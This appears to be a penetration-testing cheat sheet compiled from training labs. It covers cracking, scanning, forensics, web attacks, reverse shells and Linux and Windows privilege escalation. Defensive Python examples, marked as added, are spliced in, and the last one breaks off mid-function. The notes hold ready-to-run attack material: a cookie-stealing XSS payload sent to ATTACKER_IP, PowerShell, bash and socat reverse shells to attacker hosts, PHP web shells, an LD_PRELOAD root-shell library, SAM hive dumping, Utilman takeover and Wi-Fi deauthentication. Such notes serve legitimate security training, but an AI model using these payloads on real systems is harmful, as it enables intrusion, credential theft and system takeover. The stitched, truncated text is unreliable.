- Bruteforce
- hashcat
- john
- Install from source
cd ~
git clone https://github.com/openwall/john
sudo apt install libssl-dev
cd john/src
./configure && make
echo 'export PATH="$PATH:$HOME/john/run"' >> ~/.bashrc
echo "alias john='~/john/run/john'" >> ~/.bashrc
source ~/.bashrc
- ssh2john.py
unshadow passwd.txt shadow.txt > to-crack.txt
john --wordlist=rockyou.txt to-crack.txt
- hydra
hydra -l username -P wordlist.txt server service
hydra -l username -P wordlist.txt service://[MACHINE_IP]:service_port
- POST Web Form
sudo hydra <username> <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"
- SSH
hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh
- Encryption/Decryption
- gpg (GNU Privacy Guard)
- Encrypt:
gpg --symmetric --cipher-algo CIPHER message.txt
- Decrypt:
gpg --output original_message.txt --decrypt message.gpg
- ASCII Armoured Output:
gpg --armor --symmetric --cipher-algo CIPHER message.txt
- openssl
- CSR
openssl req -new -nodes -newkey rsa:4096 -keyout key.pem -out cert.csr
- Python Tools
- xfreerdp
sudo apt-get install freerdp2-x11
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:10.10.31.212 /u:Administrator /p:'TryH4ckM3!'
- https://nostarch.com/catalog/security
- hashes.com
- crackstation.net
- cyberchef
- sms-pdu-to-text
- https://www.alpertron.com.ar/JAVAPROG.HTM
- microcorruption.com
- https://base64.guru/
- https://www.arin.net/
- IP Info
- whois lookup
- Expand URL
- URL Scan
- Talos Reputation Center
- Track Cryptocurrency Transactions from Wallet Address
- Steganography
- Zero-Width Space Steganography
- jsteg - JPEG Steganography
- Steganography PNG
- steghide
- zsteg
- binwalk
- exiftool
- cyberchef
- Payloads
python3 -c 'import sys; sys.stdout.buffer.write(b"A"*16 + b"\x69\xfe\xca\x00" + b"\x69\x15\x00\x00")' | nc ip port
- Resources
- Tools
- GDB (GNU Debugger)
gdb executable_file
disassemble main
set disassembly-flavor intel
- Add breakpoint
break *main
break *0x0000000000400607
- Run the program
run
run arguments
- Run until the next breakpoint
continue
info registers
set $register_name=value
- Step instruction
si
- Next instruction
ni
- List of info subcommands
i
help
- radare2
radare2 executable_file
- Analyze all
aaa
- Stick to the main function
s sym.main
- Print the disassembly
pdf
- Add breakpoint
db address
(db 0x00400649)
- Reopen in debugger mode (with args)
ood arg1
- Continue execution
dc
- Show registers
dr
- Set register value
dr register_name=address
- Enter visual mode
vv
- Code flow graph
VV
- Press p to display the addresses
- Press q two times to exit the view
- afvn works for any type of argument or variable
- Rename a variable
afvn new_name old_name
- V! to switch to a fancier mode
- In any visual mode, press : to type commands
- https://www.abuseipdb.com/
- Network
- Pyramid of Pain
Demonstrates that some indicators of compromise are more troubling to adversaries than others.
- TTP
- Tools
- Network Artifacts
- Host Artifacts
- Domain Names
- IP Address
- Hash Values
- Models
- Blogs
- Hash Lookups
- Fast Flux: Compromised hosts acting as proxies. The attacker controls the DNS server, so the IP address for the same domain keeps changing (using the IP addresses of the compromised hosts).
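As an added example (not part of the original notes), the rotating-IP behaviour described above can be spotted in resolver or passive-DNS logs: the detection below flags a domain that answers with many distinct A records inside a short window with low TTLs. The log lines and domain names are constructed, not real indicators.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed resolver log lines: "<ISO time> <domain> <rtype> <ip> ttl=<seconds>"
SAMPLE_LOG = """\
2024-03-01T10:00:00 cdn.example.net A 203.0.113.10 ttl=3600
2024-03-01T10:05:00 cdn.example.net A 203.0.113.10 ttl=3600
2024-03-01T10:00:00 login-update.example.org A 198.51.100.4 ttl=120
2024-03-01T10:03:00 login-update.example.org A 198.51.100.77 ttl=120
2024-03-01T10:06:00 login-update.example.org A 192.0.2.33 ttl=90
2024-03-01T10:09:00 login-update.example.org A 192.0.2.201 ttl=60
2024-03-01T10:12:00 login-update.example.org A 198.51.100.9 ttl=120
"""

def parse_line(line):
    """Split one constructed log line into (timestamp, domain, rtype, ip, ttl)."""
    ts, domain, rtype, ip, ttl = line.split()
    return datetime.fromisoformat(ts), domain, rtype, ip, int(ttl.split("=")[1])

def detect_fast_flux(log_text, window=timedelta(minutes=30), min_ips=4, max_ttl=300):
    """Return {domain: {"ips": n, "avg_ttl": t}} for domains that resolved to at
    least `min_ips` distinct addresses within one sliding `window`, with an
    average TTL at or below `max_ttl` (short TTLs are what let the IPs rotate)."""
    records = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, domain, rtype, ip, ttl = parse_line(line)
        if rtype == "A":
            records[domain].append((ts, ip, ttl))
    hits = {}
    for domain, recs in records.items():
        recs.sort()
        for i, (start, _, _) in enumerate(recs):
            in_window = [r for r in recs[i:] if r[0] - start <= window]
            ips = {ip for _, ip, _ in in_window}
            avg_ttl = sum(t for _, _, t in in_window) / len(in_window)
            if len(ips) >= min_ips and avg_ttl <= max_ttl:
                hits[domain] = {"ips": len(ips), "avg_ttl": avg_ttl}
                break
    return hits

if __name__ == "__main__":
    for domain, info in detect_fast_flux(SAMPLE_LOG).items():
        print(f"possible fast flux: {domain} ({info['ips']} IPs, avg TTL {info['avg_ttl']:.0f}s)")
```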
- Malware Sandboxes
- Punycode
- Log Analysis
- Log Configurations
- Security
- Operational
- Legal
- Debug
- Logging Principles
- Collection
- Format
- Archiving and Accessibility
- Monitoring and Alerting
- Security
- Continuous Change
- Logging Challenges
- Data Volume and Noise
- System Performance and Collection
- Process and Archive
- Security
- Analysis
- Misc
- Types of Logs
- Application Logs
- Audit Logs
- Security Logs
- Server Logs
- System Logs
- Network Logs
- Database Logs
- Web Server Logs
- Common Log File Locations
- Web Servers
- Nginx
- Access Logs:
/var/log/nginx/access.log
- Error Logs:
/var/log/nginx/error.log
- Apache
- Access Logs:
/var/log/apache2/access.log
- Error Logs:
/var/log/apache2/error.log
- Databases
- MySQL
- Error Logs:
/var/log/mysql/error.log
- PostgreSQL
- Error and Activity Logs:
/var/log/postgresql/postgresql-{version}-main.log
- Web Applications
- PHP
- Error Logs:
/var/log/php/error.log
- Operating Systems
- Linux
- General System Logs:
/var/log/syslog
- Authentication Logs:
/var/log/auth.log
- Firewalls and IDS/IPS
- iptables:
- Firewall Logs:
/var/log/iptables.log
- Snort:
- Snort Logs:
/var/log/snort/
- Tools
- DFIR
- Basics
- Artifacts: Pieces of evidence that point to an activity performed on a system.
- Evidence Preservation: Maintain the integrity of the evidence we are collecting.
- Chain of Custody: Once evidence is collected, it must be ensured that it is kept in secure custody.
- Order of Volatility: Digital evidence is often volatile.
- Timeline Creation: A timeline of events needs to be created for efficient and accurate analysis.
- Tools
- Incident Response Process
- Preparation
- Identification
- Containment
- Eradication
- Recovery
- Lessons Learned
- Basics
- Windows Forensics
- Registry Editor
regedit.exe
- Windows Registry
- Registry Keys
- Registry Values
- Registry Hive: A group of keys, subkeys, and values stored in a single file on the disk.
- Windows Registry Root Keys
HKEY_CURRENT_USER
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
- Registry Hives Offline
C:\Windows\System32\Config
- DEFAULT (mounted on HKEY_USERS\DEFAULT)
- SAM (mounted on HKEY_LOCAL_MACHINE\SAM)
- SECURITY (mounted on HKEY_LOCAL_MACHINE\Security)
- SOFTWARE (mounted on HKEY_LOCAL_MACHINE\Software)
- SYSTEM (mounted on HKEY_LOCAL_MACHINE\System)
- C:\Users\<username>\
- NTUSER.DAT (mounted on HKEY_CURRENT_USER when a user logs in). Location: C:\Users\<username>\
- USRCLASS.DAT (mounted on HKEY_CURRENT_USER\Software\CLASSES). Location: C:\Users\<username>\AppData\Local\Microsoft\Windows
- Amcache Hive
Saves information on programs that were recently run on the system.
Location:
C:\Windows\AppCompat\Programs\Amcache.hve
- Registry Transaction Logs: Windows often uses transaction logs when writing data to registry hives.
- The transaction log for each hive is stored as a registry_hive_name.LOG file in the same directory as the hive itself.
- Registry Backups
Hives are copied to
C:\Windows\System32\Config\RegBack
every 10 days.
- Linux Forensics
- Email Analysis
- Internet Message Format (IMF): "Show Original" from the more options menu in Gmail.
- Email Headers
X-Originating-IP
Reply-To (or Return-Path)
Authentication-Results (smtp.mailfrom / header.from)
Content-Type
Content-Disposition
Content-Transfer-Encoding
Content-Id
X-Attachment-Id
- Email Header Analysis
- https://www.arin.net/: shows which ISP (Internet Service Provider) or web host the IP address belongs to.
- IP Info
- whois lookup
- Hyperlinks or IP addresses should be "defanged". For example, from http://www.suspiciousdomain.com to hxxp[://]www[.]suspiciousdomain[.]com
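Added example (not from the original notes): a small Python defang/refang pair that produces exactly the hxxp[://]www[.]suspiciousdomain[.]com form shown above for URLs, bare hostnames and IPv4 addresses found anywhere in report text. The regex and sample strings are my own.

```python
import re

# Optional scheme, then either an IPv4 address or a dotted hostname (final label
# letters only, so abbreviations such as "e.g." are left alone), then the rest
# of the URL up to whitespace or a quote.
_TARGET = re.compile(
    r"\b(?:(?P<scheme>https?|ftp)://)?"
    r"(?P<host>\d{1,3}(?:\.\d{1,3}){3}|(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,})"
    r"(?P<rest>[^\s<>\"']*)"
)

def defang(text: str) -> str:
    """Rewrite URLs and IPs so they cannot be clicked or auto-linked:
    http://www.suspiciousdomain.com -> hxxp[://]www[.]suspiciousdomain[.]com"""
    def repl(m):
        out = ""
        if m.group("scheme"):
            out = m.group("scheme").replace("tt", "xx").replace("ftp", "fxp") + "[://]"
        return out + m.group("host").replace(".", "[.]") + m.group("rest")
    return _TARGET.sub(repl, text)

def refang(text: str) -> str:
    """Inverse of defang(), for handing an indicator to a lookup or scanner."""
    return (text.replace("hxxp", "http").replace("fxp", "ftp")
                .replace("[://]", "://").replace("[.]", "."))

if __name__ == "__main__":
    # Constructed report sentence; the domain and IP are documentation examples.
    note = "Link https://evil.example.org/login?x=1 sent from 198.51.100.4 (see e.g. the header)."
    print(defang(note))
```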
- Expand URL
- URL Scan
- Talos Reputation Center
- URL Extractor
- Tracking Pixel: An HTML code snippet which is loaded when a user visits a website or opens an email, for example a small pixel-sized image loaded when the email is opened. It allows the attacker to track the success of the phishing attack.
- Typosquatting
- Get hash value of the attachment
- VirusTotal
- PhishTool
- Email Security
- SPF (Sender Policy Framework): An SPF record is a DNS TXT record containing a list of the IP addresses that are allowed to send email on behalf of your domain.
- DKIM (DomainKeys Identified Mail): A DKIM record also exists in the DNS, but it is a bit more complicated than SPF. DKIM's advantage is that it can survive forwarding, which makes it superior to SPF and a foundation for securing your email.
- DMARC: An open source standard that uses a concept called alignment to tie together the results of two other open source standards, SPF and DKIM.
- Phishing IR Playbook
- S/MIME (Secure Multipurpose Internet Mail Extensions)
- Digital Signatures
- Encryption
- Timestomping
- APT (Advanced Persistent Threat)
- TTP (Tactics, Techniques, and Procedures)
- Nessus (Vulnerability Scanner)
sudo /bin/systemctl start nessusd.service
- Visit https://localhost:8834/
- MITRE
- Attack Navigator
- CAR (Cyber Analytics Repository)
- Engage
- Defend
- Engenuity
- Yara
- Zero Logon Vulnerability
- OpenVAS (Open Vulnerability Assessment Scanning)
sudo docker run -d -p 443:443 --name openvas mikesplain/openvas
- MISP (Malware Information Sharing Platform)
- Support
- IoC Database
- Automatic Correlation
- Data Sharing
- Import & Export Features
- Event Graph
- API Support
- Cyber Threat Intelligence (CTI)
- Lifecycle
- Direction
- Collection
- Processing
- Analysis
- Dissemination
- Feedback
- Frameworks
- MITRE ATT&CK
- TAXII
- STIX
- Cyber Kill Chain
- The Diamond Model
- abuse.ch (community-driven threat intelligence on cyber threats)
- Talos Intelligence
- OpenCTI
- Memory Forensics
- Volatility
volatility -f Win7-Jigsaw.raw imageinfo
volatility -f Win7-Jigsaw.raw --profile=Win7SP1x64 pslist
volatility -f Win7-Jigsaw.raw --profile=Win7SP1x64 dlllist -p 3704
- OWASP
- Postman
- Burp Suite
- OWASP ZAP
- https://github.com/assetnote/kiterunner
- https://github.com/xmendez/wfuzz
- https://github.com/owasp-amass/amass
- ffuf
- dirb
- gobuster
- Directory Enumeration
gobuster dir -u MACHINE_IP -w /snap/seclists/current/Discovery/Web-Content/directory-list-1.0.txt
- -x php,txt,html will add these extensions to each word while enumerating.
- -t 250 sets the number of concurrent threads.
- nikto
- nessus
- Inspect Webhook and HTTP Requests
- BeEF
- XSS
- Blind XSS
- XSS Polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
- Cookie Stealing XSS
</textarea><script>fetch('http://ATTACKER_IP:PORT?cookie=' + btoa(document.cookie) );</script>
<iframe src="javascript:alert(`xss`)">
- Command Injection
- SQLi
- In-Band
- Blind
- Authentication Bypass
- Boolean-based
- Time-based
- Out-of-Band
- Subresource Integrity (SRI)
- Generate Hash: https://www.srihash.org/
<script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
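Added example (not from the original notes): this Python computes the integrity value the way srihash.org does for the bytes of a script, emits the matching tag, and checks fetched bytes against an existing attribute the way a browser would (strongest listed algorithm wins). The script body is constructed, so its hash is for the sample only, not for jQuery.

```python
import base64
import hashlib

# Algorithms browsers accept for SRI, weakest to strongest.
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")

def sri_hash(content: bytes, algo: str = "sha256") -> str:
    """Return "<algo>-<base64 digest>" for the exact bytes a browser will receive."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"

def sri_script_tag(src: str, content: bytes, algo: str = "sha384") -> str:
    """Build the <script> tag for a third-party resource; crossorigin is needed
    for the integrity check to run on cross-origin scripts."""
    return (f'<script src="{src}" integrity="{sri_hash(content, algo)}" '
            f'crossorigin="anonymous"></script>')

def sri_matches(content: bytes, integrity: str) -> bool:
    """Verify bytes against an integrity attribute. Like a browser, only the
    strongest listed algorithm counts, and any one of its hashes may match.
    Unlike a browser (which ignores an attribute with no usable hash), this
    audit helper fails closed and returns False."""
    by_algo = {}
    for token in integrity.split():
        algo, _, value = token.partition("-")
        if algo in SRI_ALGORITHMS and value:
            # Options after "?" are reserved by the spec and ignored here.
            by_algo.setdefault(algo, set()).add(value.split("?", 1)[0])
    if not by_algo:
        return False
    strongest = max(by_algo, key=SRI_ALGORITHMS.index)
    expected = sri_hash(content, strongest).partition("-")[2]
    return expected in by_algo[strongest]

# Constructed sample script body standing in for a downloaded library file.
SAMPLE_JS = b"(function(){window.lib={version:'1.0.0'};})();"

if __name__ == "__main__":
    print(sri_script_tag("https://cdn.example.com/lib.js", SAMPLE_JS))
    print("tampered copy accepted?", sri_matches(SAMPLE_JS + b"//x", sri_hash(SAMPLE_JS)))
```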
- bypass-403
- Poison Null Byte "%00"
http://10.10.91.44/ftp/package.json.bak%2500.md
- By placing a NULL character in the string at a certain byte, the string tells the server to terminate at that point, nulling the rest of the string.
- Broken Access Control
- Horizontal Privilege Escalation: A user performing an action or accessing data of another user with the same level of permissions.
- Vertical Privilege Escalation: A user performing an action or accessing data of another user with a higher level of permissions.
- Upload Vulnerabilities
- Overwriting Existing Files
- Remote Code Execution (RCE)
- It's worth noting that in a routed application (i.e. an application where the routes are defined programmatically rather than being mapped to the file-system), this method of attack becomes a lot more complicated and a lot less likely to occur. Most modern web frameworks are routed programmatically.
- Webshells
gobuster dir -u SERVER_URL -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 250
<?php echo system($_GET["cmd"]); ?>
- Reverse/Bind Shells
- Bypassing Client-Side Filtering
- Burp Suite
- Bypassing Server-Side Filtering
- File Extensions
- Magic Numbers
while read line; do echo "$line"; done < flag.txt
grep . flag.txt
(the period matches any character)
nc -lvnp port
rlwrap nc -lvnp port
- CTRL + Z, then:
stty raw -echo; fg
- socat static compiled binary
- Change Terminal Size
stty -a
stty rows number
stty cols number
socat TCP-L:PORT -
socat TCP:TARGET_IP:TARGET_PORT -
- Fully Stable Linux TTY Reverse Shell
- Listener
socat TCP-L:PORT FILE:TTY,raw,echo=0
- Activation Command
socat TCP:ATTACKER_IP:ATTACKER_PORT EXEC:"bash -li",pty,stderr,sigint,setsid,sane
- Reverse Shells
- Windows
socat TCP:LOCAL_IP:LOCAL_PORT EXEC:powershell.exe,pipes
- Linux
socat TCP:LOCAL_IP:LOCAL_PORT EXEC:"bash -li"
- Blind Shells
- Windows
socat TCP-L:PORT EXEC:powershell.exe,pipes
- Linux
socat TCP-L:PORT EXEC:"bash -li"
- Encrypted Shells: replace TCP with OPENSSL
- Generate Certificate
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
- Listener
socat OPENSSL-LISTEN:PORT,cert=shell.pem,verify=0 -
- Activation Command
socat OPENSSL:LOCAL_IP:LOCAL_PORT,verify=0 EXEC:/bin/bash
- Common
nmap -A -sC -sV -p- -T4 --min-rate=9326 -vv MACHINE_IP
nmap -Pn -sV MACHINE_IP
nmap MACHINE_IP -p port1,port2,port3 -script vuln
- Options
- no DNS lookup
-n
- reverse-DNS lookup
-R
- host discovery only (without port-scanning)
-sn
- all ports
-p-
- scan ports 1 to 1023
-p1-1023
- 100 most common ports
-F
- scan ports in consecutive order
-r
- T0 being the slowest and T5 the fastest
-T<0-5>
- rate <= 50 packets/sec
--max-rate 50
- rate >= 15 packets/sec
--min-rate 15
- at least 100 probes in parallel
--min-parallelism 100
- debugging
-d
- verbose
-v
- explains reasoning
--reason
- fragment IP data
-f
- specify source port
--source-port PORT_NUM
- append random data to reach given length
--data-length NUM
- service/version info
-sV
- os detection
-O
- traceroute
--traceroute
- ARP Scan
sudo nmap -PR -sn MACHINE_IP/24
- ICMP
- ICMP Echo Scan
sudo nmap -PE -sn MACHINE_IP/24
- ICMP Timestamp Scan
sudo nmap -PP -sn MACHINE_IP/24
- ICMP Address Mask Scan
sudo nmap -PM -sn MACHINE_IP/24
- TCP
- TCP SYN Ping Scan
sudo nmap -PS22,80,443 -sn MACHINE_IP/30
- TCP ACK Ping Scan
sudo nmap -PA22,80,443 -sn MACHINE_IP/30
- TCP Connect Scan
nmap -sT 10.10.117.61
- TCP Null Scan
sudo nmap -sN MACHINE_IP
- TCP FIN Scan
sudo nmap -sF MACHINE_IP
- TCP Xmas Scan
sudo nmap -sX MACHINE_IP
- TCP Maimon Scan
sudo nmap -sM MACHINE_IP
- Custom TCP Scan
sudo nmap --scanflags URGACKPSHRSTSYNFIN MACHINE_IP
- UDP
- UDP Ping Scan
sudo nmap -PU53,161,162 -sn MACHINE_IP/30
- Spoofed Source IP
sudo nmap -S SPOOFED_IP MACHINE_IP
- Spoofed MAC Address
--spoof-mac SPOOFED_MAC
- Decoy Scan
nmap -D DECOY_IP,ME MACHINE_IP
- Idle (Zombie) Scan
sudo nmap -sI ZOMBIE_IP MACHINE_IP
enum4linux -a MACHINE_IP
- Traffic Analysis
- wireshark
- tshark
- NetworkMiner
- RSA Netwitness
- apackets (Online)
- MITM
- Wifi
- aircrack-ng
- Check for Wifi adapter interface
iwconfig
- Run Wifi adapter in Monitor mode
sudo airmon-ng start interface_name
- Check and kill any interfering process
sudo airmon-ng check kill
- Capture traffic from nearby Wifi
sudo airodump-ng interface_name
- Capture traffic from target Wifi
sudo airodump-ng --bssid target_bssid -c target_channel --write target_traffic interface_name
- Deauthentication attack
sudo aireplay-ng --deauth packet_count -a target_bssid interface_name
- In case of an issue like "wlan0mon is on channel 2, but the AP uses channel 5":
sudo airmon-ng start interface_name target_channel
- Cracking the password
sudo aircrack-ng -b target_bssid captured_traffic.cap -w wordlist
- Convert to hashcat file (-j or -J)
sudo aircrack-ng -j output.hccapx -b target_bssid file.cap
- wifite
- Database
systemctl start postgresql
msfdb init
- db_status
- workspace
- help
- db_nmap
- hosts
- services
- SMTP
- smtp_enum
- smtp_version
- MySQL
- mysql_sql
- mysql_schemadump
- mysql_hashdump
- multi/handler
use multi/handler
exploit -j
- msfvenom
msfvenom -p PAYLOAD OPTIONS
- Payload Name: OS/arch/payload, e.g.
linux/x86/shell_reverse_tcp
- Windows x64 Reverse Shell in an exe format
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=listen-IP LPORT=listen-port
- Payloads
- Staged Payloads (/) (Better for evading firewalls)
- Stageless Payloads (_) (Can be caught using an nc listener instead of multi/handler)
msfvenom --list payloads
msfvenom --list payloads | grep "some_payload"
- portscan
- SMB
- smb_enumshares
- smb_version
- smb_login
- enum_shares
- meterpreter
- hashdump
- kiwi
- Windows PowerShell Reverse Shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.17.69.74',12345);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
- Web Shells
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
- PEASS-ng
- GTFOBins
- DirtyCow
- Linux
- Commands
hostname
uname -a
/proc/version
/etc/issue
- ps
ps
ps -A
ps axjf
ps aux
env
sudo -l
id
/etc/passwd
cat /etc/passwd | cut -d ":" -f 1
cat /etc/passwd | grep home
history
ifconfig
ip route
netstat
netstat -a
find
find /home -name flag1.txt
- LinPeas
- LinEnum
- Kernel Exploit
- Sudo
sudo -l
- https://gtfobins.github.io/
- LD_PRELOAD
Generate a shared library which will be loaded and executed before the program is run.
- Check for LD_PRELOAD (with the env_keep option)
- Write a simple C program compiled as a shared object (.so extension) file
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
- Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
- SUID
- List the files that have SUID or SGID set
find / -type f -perm -04000 -ls 2>/dev/null
nano
base64
- Capabilities
getcap
- List enabled capabilities
getcap -r / 2>/dev/null
- Cron Jobs
/etc/crontab
- Reverse Shell
#!/bin/bash
bash -i &> /dev/tcp/10.10.217.232/1234 0>&1
chmod +x target_file
- PATH
echo $PATH
- Write a script (gateway) that will search for a command (attack) from the PATH:
#!/usr/bin/python3
import os
import sys
try:
    os.system("/bin/bash")
except:
    sys.exit()
Make it executable.
- Set SUID bit
chmod u+s gateway
- If we have write access to any path listed in PATH, we create a binary (attack) with the same name as the command
- attack
echo "/bin/bash" >> attack
chmod 777 attack
- Find writable folders
find / -writable 2>/dev/null
find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
- Add folder to PATH
export PATH=/folder_name:$PATH
- Now, if we run the script (gateway), it will run the binary (attack) with root privilege.
- NFS
- On target machine
cat /etc/exports
Find a share with no_root_squash
- Enumerate mountable shares
showmount -e target_ip
- Mount one of the no_root_squash shares on the attacking machine.
- Build an executable (attack.py)
#!/usr/bin/python3
import os
import sys
try:
    os.system("/bin/bash")
except:
    sys.exit()
- Set SUID bit
chmod +s attack.py
- Copy it to the mounted directory
- Execute it from target machine (shell)
- Windows
- Print
type flag.txt
- Create a new user
net user username password /add
- Add the user to administrator group
net localgroup administrators username /add
schtasks
schtasks /query /tn task_name /fo list /v
schtasks /run /tn task_name
- icacls
To check file permissions of an executable:
icacls file_path
icacls service_name /grant Everyone:F
- sc qc
BINARY_PATH_NAME: associated executable
SERVICE_START_NAME: account used to run the executable
sc server_name qc service_name
sc qc service_name
sc start service_name
sc stop service_name
- Discretionary Access Control List (DACL)
- Process Hacker
- All service configurations are stored in the registry under
HKLM\SYSTEM\CurrentControlSet\Services\
- Permissions: F (Full Access), M (Modify), RX (Read-Execute), I (Inherit)
- Insecure Permissions on Service Executables: M access permission to the executable
- Unquoted Service Paths
BINARY_PATH_NAME : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
Windows tries each of these in order:
C:\MyPrograms\Disk.exe
C:\MyPrograms\Disk Sorter.exe
C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
- But we need write permission to the parent directory
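Added example (not from the original notes): a Python audit helper that, given BINARY_PATH_NAME values as reported by sc qc, reproduces the lookup order shown above and lists the parent directories whose write ACLs must be checked during a hardening review. The service names and paths are constructed.

```python
import ntpath

def unquoted_path_candidates(image_path: str):
    """Return the executables Windows will try, in order, for an unquoted service
    path containing spaces; [] when the path is quoted or has no spaces."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    # Ignore arguments after the executable name ("... svc.exe -k foo").
    idx = path.lower().find(".exe")
    exe = path[: idx + 4] if idx >= 0 else path
    if " " not in exe:
        return []
    parts = exe.split(" ")
    candidates = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    candidates.append(exe)
    return candidates

def dirs_to_check(image_path: str):
    """Directories where a planted file would be found before the real binary;
    these are the ones whose write permissions an audit must verify."""
    return sorted({ntpath.dirname(c) for c in unquoted_path_candidates(image_path)[:-1]})

def audit_services(services: dict):
    """Map service name -> BINARY_PATH_NAME; return only the risky ones."""
    findings = {}
    for name, path in services.items():
        cands = unquoted_path_candidates(path)
        if cands:
            findings[name] = {"tries": cands, "check_dirs": dirs_to_check(path)}
    return findings

# Constructed sample, in the shape of BINARY_PATH_NAME values from "sc qc".
SAMPLE_SERVICES = {
    "disksorter": r"C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe",
    "goodsvc": r'"C:\Program Files\Good Vendor\svc.exe" -k netsvcs',
    "nospaces": r"C:\Windows\System32\svchost.exe -k LocalService",
    "updater": r"C:\Program Files\Acme Tools\updater.exe /background",
}

if __name__ == "__main__":
    for svc, info in audit_services(SAMPLE_SERVICES).items():
        print(svc, "->", info["tries"])
        print("   check write ACLs on:", info["check_dirs"])
```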
- Insecure Service Permissions
- If the service DACL (not the service executable's DACL) allows us to modify the configuration of a service, we will be able to reconfigure the service.
- To check a service DACL from the command line, use AccessChk:
accesschk64.exe -qlc service_name
SERVICE_ALL_ACCESS: can reconfigure the service
- Windows Privileges
whoami /priv
- Priv2Admin
- SeBackup/SeRestore: Allow users to read and write to any file in the system, ignoring any DACL in place.
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive
- SeTakeOwnership: Allows a user to take ownership of any object on the system. Example with utilman.exe:
takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
copy cmd.exe utilman.exe
- Clicking on the ease of access button (utilman), we now get a cmd with system privileges.
- SeImpersonate/SeAssignPrimaryToken: Allow a process to impersonate other users and act on their behalf.
- Vulnerable Software
wmic
wmic product get name,version,vendor
- Case Studies
- Druva inSync 6.6.3
- OSINT Framework
- hunter.io
- theHarvester
- Social
- sherlock
- LinkedInt: https://github.com/vysecurity/LinkedInt
- gophish: https://github.com/gophish/gophish
- Google Dorking
- Wayback Machine
- Subdomain Enumeration
- Certificate Search
- Sublist3r
- Domain Name or IP Related
- File Related
- recon-ng
- maltego
- https://www.exploit-db.com/
- https://www.exploit-db.com/searchsploit
- https://nvd.nist.gov/vuln/search
- https://www.rapid7.com/db/
- https://cve.mitre.org/
- https://www.cvedetails.com/
- Zero Logon Vulnerability (Secura Whitepaper)
- OpenVAS
sudo docker run -d -p 443:443 --name openvas mikesplain/openvas
- Static Malware Analysis
- Antivirus (AV)
- SharpEDRChecker
- Open Source
- AntiscanMe
- Jotti
- Fuzzy Hashing (Similarity Preserving Hash Functions or SPHF)
- MISP (Malware Information Sharing Platform)
- Remote Access Trojan (RAT)
- Identify the compiler/packer of a file
- Just because a file doesn't have the .exe extension doesn't mean it isn't an actual executable! It can have the .jpg extension and still be an executable piece of code. This depends on file signatures.
- If a file isn't obfuscated/packed, it should have a larger import count and a more complex code flow graph when viewed in a disassembler.
- vmonkey: ViperMonkey is a parser engine that is capable of analysing Visual Basic macros without executing (opening) the document.
- Malicious PDFs
- Can include
- Javascript
- Python
- Executables
- Powershell Shellcode
peepdf demo_notsuspicious.pdf
echo 'extract js > javascript-from-demo_notsuspicious.pdf' > extracted_javascript.txt
peepdf -s extracted_javascript.txt demo_notsuspicious.pdf
readelf -l file_name
- File Entropy
- A rating that scores (0-8.0) how random the data within a PE file is.
- Encrypted/packed file will have high entropy score.
- Packers change the entry point from the original location to what's called the "Unpacking Stub". Once the program is fully unpacked, the entry point will now relocate back to its normal place to begin executing code.
- Packed files will have very few "Imports". (May only have "GetProcAddress" and "LoadLibrary")
- They may have sections named after certain packers such as UPX.
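Added example (not from the original notes): computing the 0-8 entropy score described above in Python, section by section, and flagging sections that look packed or encrypted. The three sections are constructed in the script rather than parsed from a real PE file.

```python
import math
import random
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 when every byte is identical,
    8.0 when all 256 values are equally frequent."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def section_entropies(sections, threshold=7.0):
    """Return [(name, entropy, flagged)] for (name, bytes) pairs. Packed or
    encrypted sections usually score close to 8.0; plain code and text
    usually sit well below the threshold."""
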